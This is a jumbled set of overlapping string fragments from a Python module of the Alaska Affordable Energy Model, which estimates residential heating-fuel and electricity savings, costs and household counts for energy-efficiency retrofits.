\"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self):", "constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt,", "fuel consumed for a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH", "self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost =", "Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric", "\"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH =", "self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~", "Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil,", "calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction", "= np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost", "Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year)", "savings are based on the number of units that have not been retrofit", "Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\",", "proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption", "All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential:", "b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price", "Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and", "int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component.", "(Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost,", "+ \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other", "reason for failure if run == False Notes ----- Accepted scalers: capital costs.", "\"\"\"calculate consumption by fuel from the total consumption Parameters ---------- fuel_amnt: float %", "np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH *", "self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\",", "return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price =", "run. Parameters ---------- scalers : dictionary of valid scalers, optional Scalers to adjust", "calculated. There must be a known Heat Recovery project for this component to", "= np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price =", "from. con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses =", "= self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption", "variables. See note on accepted scalers Attributes ---------- run : bool True in", "---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices +", "gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost", "\"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\":", "All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost", "Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post", "\\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def", "Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio,", "Cost of Energy, and Internal Rate of Return will all be calculated. There", "\\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self):", "= self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption", "= total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) /", "Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\":", "(gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential:", "\"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\"", "will all be calculated. There must be a known Heat Recovery project for", "financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital", "per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con =", "self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price", "directory Parameters ---------- directory : path output directory \"\"\" if not self.was_run: return", "Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year)", "optional prerequisite component data this component has no prerequisites leave empty Attributes ----------", "EUI Reduction\"]) total = area * EUI # the one in each of", "Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost", "Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\":", "been retrofit as of 2010, the performance improvements as a percentage of the", "\"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years,", "Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption", "Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post", "prerequisites : dictionary of components, optional prerequisite component data \"\"\" self.diagnostics = diag", "calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption", "self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted +=", "kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption", "note on accepted scalers Attributes ---------- run : bool True in the component", "Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\",", "Scalers to adjust normal run variables. See note on accepted scalers Attributes ----------", "number of units that have not been retrofit as of 2010, the performance", "cd : dictionary general data for a community. Initial value: 'community' section of", "os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast", "on accepted scalers Attributes ---------- run : bool True in the component runs", "\"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption", "gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ----------", "r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"])", "Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost", "= int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the", "(gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating", "Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of Return will all", "for tracking error/warning messages initial value: diag or new diagnostics object forecast :", "retrofit each home is also calculated. Parameters ---------- community_data : CommunityData CommunityData Object", "component runs to completion, False otherwise reason : string lists reason for failure", "self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption *", "self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\", "NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy,", "self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential", "percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF", "fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP", "Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year)", "Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post", "self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house =", "self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption *", "(kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane", "if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community')", "\" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for the", "r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price", "wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec", "int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if", "if len(tag) > 1 and tag[1] != 'residential': self.was_run = False self.reason =", "kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption", "($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int)", "b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price", "self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh", "self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\",", "kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0]", "self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~", "data module, see information on CommunityData Object aaem.forecast : forecast module, see information", "(self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses that can be", "\"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households", "self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year:", "(MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total", "constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\", "ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential", "estimated households for first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH =", "\" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate", "total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] /", "value: 'community' section of community_data comp_specs : dictionary component specific data for a", "fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes", "= 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\", "== None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec", "coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost :", "Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\":", "the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh per household'] yr =", "The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV", "in the the forecast to values calculated in this component \"\"\" years =", "string lists reason for failure if run == False Notes ----- Accepted scalers:", "Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH", "setting to 0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~", "elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price']", "-rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH <", "None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~", "Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane", "savings_HF : float savings in heating oil consumption savings_wood : float savings in", "[gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption)", "CommunityData CommunityData Object for a community forecast : Forecast forecast for a community", "Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year)", "Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year)", "Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating", "self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price']", "str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for the first year", "(Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit", "* HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ----------", "scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs, Annual", "year of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop =", "Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year)", "Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted", "Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption", "\"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post", "{}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a community", "Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption", "np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler *", "Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year)", "columns in the the forecast to values calculated in this component \"\"\" years", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction *", "consumption init_gas : float initial natural gas fuel consumption init_LP : float initial", "self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\"", "def set_forecast_columns (self): \"\"\"Set columns in the the forecast to values calculated in", "Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI", "self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) /", "self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else:", "self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost()", "Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost", "opportunity_HH : int Houses that can be retrofit savings_HF : float savings in", "---------- init_HF : float initial heating oil consumption init_wood : float initial heating", "years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\", "savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES", "b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year)", "100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt", "to retrofit each home is also calculated. Parameters ---------- community_data : CommunityData CommunityData", "of households for the first year of the project Attributes ---------- init_HH :", "val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val", "(Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel", "Internal Rate of Return will all be calculated. There must be a known", "heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price =", "cf): \"\"\"calculate consumption by fuel from the total consumption Parameters ---------- fuel_amnt: float", "Alaska Affordable Energy Model: This module estimates the potential improvements to heating efficiency", "Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural", "the forecasted price of offset heating fuels. The cost to retrofit each home", "negative, setting to 0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"]", "= (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric", "accepted scalers Attributes ---------- run : bool True in the component runs to", "# the one in each of these function calls is an identity amnt", "Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane", "self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler *", "self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) /", "self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed", "calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs : float total cost", "- r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec", "Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites =", "dictionary of components, optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics", "propane consumption savings_kWh : float savings in electric consumption savings_mmbtu: float total savings", "self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population", "= np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil", "Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\":", "self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\", "------- float: fuel consumed for a type of fuel \"\"\" HH_consumption = HH", "fuel saved. Returns ------- float the total fuel saved in gallons \"\"\" base_heat", "def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float the total energy", "* (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP)", "self.reason = \"Not a residential project.\" return # needed for electric or HF", "Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential:", "b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost =", "scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price']", "self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs", "residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities", "Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass", "Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost", "CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants", "self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 #", ": dictionary general data for a community. Initial value: 'community' section of community_data", "Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil", "Returns ------- float the total fuel saved in gallons \"\"\" base_heat = \\", "Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption", "proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption", "False self.reason = \"Not a residential project.\" return # needed for electric or", "Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(),", "initial natural gas fuel consumption init_LP : float initial propane consumption init_kWh :", "self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost =", "forecast for a community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages", "\"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years,", "6000.0 # comes from. con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year'])", "(gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential:", "float: fuel consumed for a type of fuel \"\"\" HH_consumption = HH *", "b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost", "(kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year)", "of components, optional prerequisite component data this component has no prerequisites leave empty", "(kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating", "(cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass", "def calc_init_HH (self): \"\"\"Estimate the # of households for the first year of", "All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil", "= int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population /", "Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post", "Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year)", "Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption", "* \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * 